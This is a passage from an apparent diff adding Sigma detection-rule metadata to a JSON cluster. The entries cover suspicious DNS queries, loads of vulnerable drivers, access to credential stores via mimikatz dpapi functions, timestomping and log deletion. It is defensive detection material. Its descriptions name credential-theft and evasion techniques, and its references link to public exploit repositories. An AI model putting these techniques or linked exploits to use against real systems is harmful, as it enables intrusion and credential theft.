"creation_date": "2022/08/20", + "falsepositive": [ + "Programs that also lookup the observed domain" + ], + "filename": "dns_query_win_susp_ldap.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ldap.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ] + }, + "uuid": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "value": "Suspicious LDAP Domain Access" + }, + { + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/30", + "falsepositive": [ + "Unknown binary names of TeamViewer", + "Other programs that also lookup the observed domain" + ], + "filename": "dns_query_win_susp_teamviewer.yml", + "level": "medium", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.teamviewer.com/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_teamviewer.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", + "value": "Suspicious TeamViewer Domain Access" + }, + { + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "meta": { + "author": "frack113", + "creation_date": "2022/02/20", + "falsepositive": [ + "Unknown" + ], + "filename": "dns_query_win_tor_onion.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.003" + ] + }, + "uuid": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "value": "Query Tor Onion Address" + }, + { + "description": "Detects DNS queries for subdomains used for upload to ufile.io", + "meta": { + "author": "yatinwad and TheDFIRReport", + "creation_date": "2022/06/23", + "falsepositive": [ + "Legitimate Ufile upload" + ], + "filename": "dns_query_win_ufile_io.yml", + "level": "high", + "logsource.category": "dns_query", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "value": "DNS Query for Ufile.io Upload Domain" + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "meta": { + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2017/03/05", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "filename": "driver_load_mal_creddumper.yml", + "level": "critical", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ] + }, + "uuid": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "value": "Credential Dumping Tools Service Execution" + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "meta": { + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "creation_date": "2019/10/26", + "falsepositive": [ + "Highly unlikely" + ], + "filename": "driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", + "level": "critical", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ] + }, + "uuid": "d585ab5a-6a69-49a8-96e8-4a726a54de46", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation" + }, + { + "description": "Detects powershell script installed as a Service", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "driver_load_powershell_script_installed_as_service.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "value": "PowerShell Scripts Run by a Services" + }, + { + "description": "Detects the load of drivers used by Process Hacker and System Informer", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/16", + "falsepositive": [ + "Legitimate user of process hacker or system informer by low level developers or system administrators" + ], + "filename": "driver_load_process_hacker.yml", + "level": "medium", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://processhacker.sourceforge.io/", + "https://systeminformer.sourceforge.io/", + "https://github.com/winsiderss/systeminformer", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_process_hacker.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ] + }, + "uuid": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "value": "Process Hacker and System Informer Driver Load" + }, + { + "description": "Detects a driver load from a temporary directory", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/12", + "falsepositive": [ + "There is a relevant set of false positives depending on applications in the environment" + ], + "filename": "driver_load_susp_temp_use.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_susp_temp_use.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", + "value": "Suspicious Driver Load from Temp" + }, + { + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "driver_load_vuln_avast_anti_rootkit_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_avast_anti_rootkit_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "7c676970-af4f-43c8-80af-ec9b49952852", + "value": "Vulnerable AVAST Anti Rootkit Driver Load" + }, + { + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/05", + "falsepositive": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "filename": "driver_load_vuln_dell_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_dell_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ] + }, + "uuid": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "value": "Vulnerable Dell BIOS Update Driver Load" + }, + { + "description": "Detects the load of known vulnerable drivers by hash value", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/18", + "falsepositive": [ + "Unknown" + ], + "filename": "driver_load_vuln_drivers.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/jbaines-r7/dellicious", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/namazso/physmem_drivers", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", + "https://github.com/tandasat/ExploitCapcom", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", + "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", + "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "value": "Vulnerable Driver Load" + }, + { + "description": "Detects the load of known vulnerable drivers via their names only.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/03", + "falsepositive": [ + "Some false positives may occure if one of the vulnerable driver names mentioned above didn't change it's name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", + "If you experience a lot of FP you could comment the driver name or it's exact known legitimate location (when possible)" + ], + "filename": "driver_load_vuln_drivers_names.yml", + "level": "medium", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/jbaines-r7/dellicious", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", + "https://github.com/namazso/physmem_drivers", + "https://github.com/stong/CVE-2020-15368", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala", + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", + "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_drivers_names.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", + "value": "Vulnerable Driver Load By Name" + }, + { + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/25", + "falsepositive": [ + "Unknown" + ], + "filename": "driver_load_vuln_gigabyte_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", + "https://twitter.com/malmoeb/status/1551449425842786306", + "https://github.com/fengjixuchui/gdrv-loader", + "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", + "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_gigabyte_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", + "value": "Vulnerable GIGABYTE Driver Load" + }, + { + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/18", + "falsepositive": [ + "Unlikely" + ], + "filename": "driver_load_vuln_hevd_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/hacksysteam/HackSysExtremeVulnerableDriver", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hevd_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "295c9289-acee-4503-a571-8eacaef36b28", + "value": "Vulnerable HackSys Extreme Vulnerable Driver Load" + }, + { + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/26", + "falsepositive": [ + "Unknown" + ], + "filename": "driver_load_vuln_hw_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", + "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_hw_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "value": "Vulnerable HW Driver Load" + }, + { + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/10", + "falsepositive": [ + "Legitimate driver loads (old driver that didn't receive an update)" + ], + "filename": "driver_load_vuln_lenovo_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", + "https://github.com/alfarom256/CVE-2022-3699/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_lenovo_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" + ] + }, + "uuid": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "value": "Vulnerable Lenovo Driver Load" + }, + { + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/26", + "falsepositive": [ + "Unknown" + ], + "filename": "driver_load_vuln_winring0_driver.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_vuln_winring0_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "1a42dfa6-6cb2-4df9-9b48-295be477e835", + "value": "Vulnerable WinRing0 Driver Load" + }, + { + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/30", + "falsepositive": [ + "Legitimate WinDivert driver usage" + ], + "filename": "driver_load_windivert.yml", + "level": "high", + "logsource.category": "driver_load", + "logsource.product": "windows", + "refs": [ + "https://reqrypt.org/windivert-doc.html", + "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_windivert.yml" + ], + "tags": [ + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" + ] + }, + "uuid": "679085d5-f427-4484-9f58-1dc30a7c426d", + "value": "WinDivert Driver Load" + }, + { + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "meta": { + "author": "frack113", + "creation_date": "2022/04/09", + "falsepositive": [ + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Software installed on other partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" + ], + "filename": "file_access_win_browser_credential_stealing.yml", + "level": "medium", + "logsource.category": "file_access", + "logsource.product": "windows", + "refs": [ + "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", + "https://github.com/lclevy/firepwd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" + ], + "tags": [ + "attack.t1003", + "attack.credential_access" + ] + }, + "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "value": "Browser Credential Store Access" + }, + { + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/11", + "falsepositive": [ + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." + ], + "filename": "file_access_win_credential_manager_stealing.yml", + "level": "medium", + "logsource.category": "file_access", + "logsource.product": "windows", + "refs": [ + "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" + ], + "tags": [ + "attack.t1003", + "attack.credential_access" + ] + }, + "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "value": "Credential Manager Access" + }, + { + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "file_access_win_dpapi_master_key_access.yml", + "level": "medium", + "logsource.category": "file_access", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ] + }, + "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", + "value": "Suspicious Access To Windows DPAPI Master Keys" + }, + { + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "file_access_win_susp_cred_hist_access.yml", + "level": "medium", + "logsource.category": "file_access", + "logsource.product": "windows", + "refs": [ + "https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist", + "https://www.passcape.com/windows_password_recovery_dpapi_credhist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ] + }, + "uuid": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "value": "Suspicious Access To Windows Credential History File" + }, + { + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/12", + "falsepositive": [ + "Changes made to or by the local NTP service" + ], + "filename": "file_change_win_2022_timestomping.yml", + "level": "high", + "logsource.category": "file_change", + "logsource.product": "windows", + "refs": [ + "https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml" + ], + "tags": [ + "attack.t1070.006", + "attack.defense_evasion" + ] + }, + "uuid": "558eebe5-f2ba-4104-b339-36f7902bcc1a", + "value": "File Creation Date Changed to Another Year" + }, + { + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "file_change_win_unusual_modification_by_dns_exe.yml", + "level": "high", + "logsource.category": "file_change", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "value": "Unusual File Modification by dns.exe" + }, + { + "description": "Detect DLL deletions from Spooler Service driver folder", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/07/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_delete_win_cve_2021_1675_printspooler_del.yml", + "level": "high", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" + ] + }, + "uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "value": "Windows Spooler Service Suspicious File Deletion" + }, + { + "description": "Deletion of log files is a known anti-forensic technique", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_delete_win_delete_appli_log.yml", + "level": "low", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_appli_log.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "b1decb61-ed83-4339-8e95-53ea51901720", + "value": "Delete Log from Application" + }, + { + "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/02", + "falsepositive": [ + "Legitime usage" + ], + "filename": "file_delete_win_delete_backup_file.yml", + "level": "medium", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "value": "Deletes Backup Files" + }, + { + "description": "Detects the deletion of a prefetch file (AntiForensic)", + "meta": { + "author": "Cedric MAURUGEON", + "creation_date": "2021/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_delete_win_delete_prefetch.yml", + "level": "high", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_delete_prefetch.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "value": "Prefetch File Deletion" + }, + { + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Possible FP during log rotation" + ], + "filename": "file_delete_win_exchange_powershell_logs.yml", + "level": "high", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "value": "Exchange PowerShell Cmdlet History Deleted" + }, + { + "description": "A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Legitime usage of SDelete" + ], + "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml", + "level": "medium", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://threathunterplaybook.com/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", + "value": "Sysinternals SDelete File Deletion" + }, + { + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml", + "level": "high", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "value": "Unusual File Deletion by dns.exe" + }, + { + "description": "Detects the deletion of WebServer access logs which may indicate an attempt to destroy forensic evidence", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/16", + "falsepositive": [ + "During uninstallation of the IIS service", + "During log rotation" + ], + "filename": "file_delete_win_webserver_access_logs_deleted.yml", + "level": "medium", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_webserver_access_logs_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "3eb8c339-a765-48cc-a150-4364c04652bf", + "value": "WebServer Access Logs Deleted" + }, + { + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "meta": { + "author": "@SerkinValery", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_access_susp_teams.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f624", + "value": "Suspicious File Event With Teams Objects" + }, + { + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/19", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_access_susp_unattend_xml.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_unattend_xml.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": 